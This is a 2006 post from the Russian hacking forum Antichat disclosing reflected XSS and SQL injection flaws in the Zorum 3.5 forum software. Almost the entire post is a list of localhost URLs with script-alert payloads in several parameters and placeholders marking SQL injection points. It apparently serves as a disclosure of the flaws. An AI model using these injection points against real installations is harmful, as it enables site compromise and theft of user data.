ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

XSS(passive) & SQL-inj в Zorum 3.5
  #1  
Старый 15.04.2006, 17:17
Аватар для _kREveDKo_
_kREveDKo_
Banned
Регистрация: 04.12.2005
Сообщений: 826
Провел на форуме:
5223479

Репутация: 3813


Post XSS(passive) & SQL-inj в Zorum 3.5

Поставил, вот, на локалку, помучал и нашёл:

(если что-то уже есть в паблике - извиняйте, я не проверял...)


_http://localhost/zorum/index.php?method=userfunctions&list=<script>alert( "lol");</script>
_http://localhost/zorum/index.php?method=<script>alert("lol");</script>
_http://localhost/zorum/index.php?method=showdetails&list=<script>alert("l ol");</script>
_http://localhost/zorum/index.php?method=showhtmllist&list=topic&rollid=[_S_Q_L__H_E_R_E_]
_http://localhost/zorum/index.php?method=create_form&list=<script>alert("l ol");</script>
_http://localhost/zorum/index.php?inf=<script>alert("lol");</script>
_http://localhost/zorum/index.php?method=login_form&list=<script>alert("lo l");</script>
_http://localhost/zorum/index.php?method=markread&list=zorumuser&fromlist= secmenu&frommethod=<script>alert("lol");</script>
_http://localhost/zorum/index.php?method=remind_password_form&list=<script >alert("lol");</script>
_http://localhost/zorum/index.php?method=remind_password&list=zorumuser&fr omlist=forum&frommethod=showhtmllist&email=[_S_Q_L__H_E_R_E_]&submit=Ok
_http://localhost/zorum/index.php?method=showattach&id=14[_S_Q_L__H_E_R_E_]

Последний раз редактировалось b00zy_c0d3r; 15.04.2006 в 17:29..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ